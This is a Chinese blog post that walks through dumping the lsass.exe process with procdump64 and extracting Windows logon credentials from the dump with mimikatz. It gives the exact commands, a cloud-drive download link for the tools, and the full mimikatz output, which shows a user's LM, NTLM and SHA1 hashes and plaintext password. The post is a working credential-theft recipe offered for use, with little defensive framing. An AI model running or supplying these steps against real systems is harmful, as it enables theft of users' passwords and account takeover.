两步完成利用procdump64+mimikatz获取win用户密码

使用procdump64+mimikatz可实现从内存中获取明文密码

工具

1
链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38

首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样

1.导出lsass.exe

1
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

 (注:必须使用管理员权限)

1
2
3
4
5
6
7
8
9
ProcDump v8.0 - Writes process dump files
Copyright (C) 2009-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards
 
[15:33:26] Dump 1 initiated: C:\Users\chenglee\Desktop\Procdump\lsass.dmp
[15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.
[15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds
[15:33:28] Dump count reached.

2.执行mimikatz

1
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(注:必须使用管理员权限)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
ECHO 处于打开状态。
 
  .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
 
mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
 
mimikatz(commandline) # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump...
 
Authentication Id : 0 ; 137859 (00000000:00021a83)
Session           : Interactive from 1
User Name         : chenglee
Domain            : chenglee-PC
Logon Server      : CHENGLEE-PC
Logon Time        : 2018/7/25 15:06:35
SID               : S-1-5-21-452281122-3045282507-3243563612-1000
    msv :  
     [00000003] Primary
     * Username : chenglee
     * Domain   : chenglee-PC
     * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
     * NTLM     : 8d0f8e1a18236379538411a9056799f5
     * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
    tspkg :
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    wdigest :  
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    kerberos : 
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    ssp :  
    credman :  
 
Authentication Id : 0 ; 137821 (00000000:00021a5d)
Session           : Interactive from 1
User Name         : chenglee
Domain            : chenglee-PC
Logon Server      : CHENGLEE-PC
Logon Time        : 2018/7/25 15:06:35
SID               : S-1-5-21-452281122-3045282507-3243563612-1000
    msv :  
     [00000003] Primary
     * Username : chenglee
     * Domain   : chenglee-PC
     * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
     * NTLM     : 8d0f8e1a18236379538411a9056799f5
     * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
    tspkg :
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    wdigest :  
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    kerberos : 
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    ssp :  
    credman :  
 
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:15
SID               : S-1-5-19
    msv :  
    tspkg :
    wdigest :  
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos : 
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :  
    credman :  
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : CHENGLEE-PC$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:15
SID               : S-1-5-20
    msv :  
    tspkg :
    wdigest :  
     * Username : CHENGLEE-PC$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos : 
     * Username : chenglee-pc$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :  
    credman :  
 
Authentication Id : 0 ; 48630 (00000000:0000bdf6)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:06
SID               :
    msv :  
    tspkg :
    wdigest :  
    kerberos : 
    ssp :  
    credman :  
 
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : CHENGLEE-PC$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:05
SID               : S-1-5-18
    msv :  
    tspkg :
    wdigest :  
     * Username : CHENGLEE-PC$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos : 
     * Username : chenglee-pc$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :  
    credman :  
 
mimikatz(commandline) # exit
Bye!

 看, 密码[lizhenghua]处于明文暴露状态.

如果不是使用管理员模式运行cmd会报错,

 

posted @   扶苏公子x  阅读(26628)  评论(2编辑  收藏  举报
编辑推荐:
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· .NET Core 中如何实现缓存的预热?
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 如何调用 DeepSeek 的自然语言处理 API 接口并集成到在线客服系统
· 【译】Visual Studio 中新的强大生产力特性

阅读目录(Content)

此页目录为空

点击右上角即可分享
微信分享提示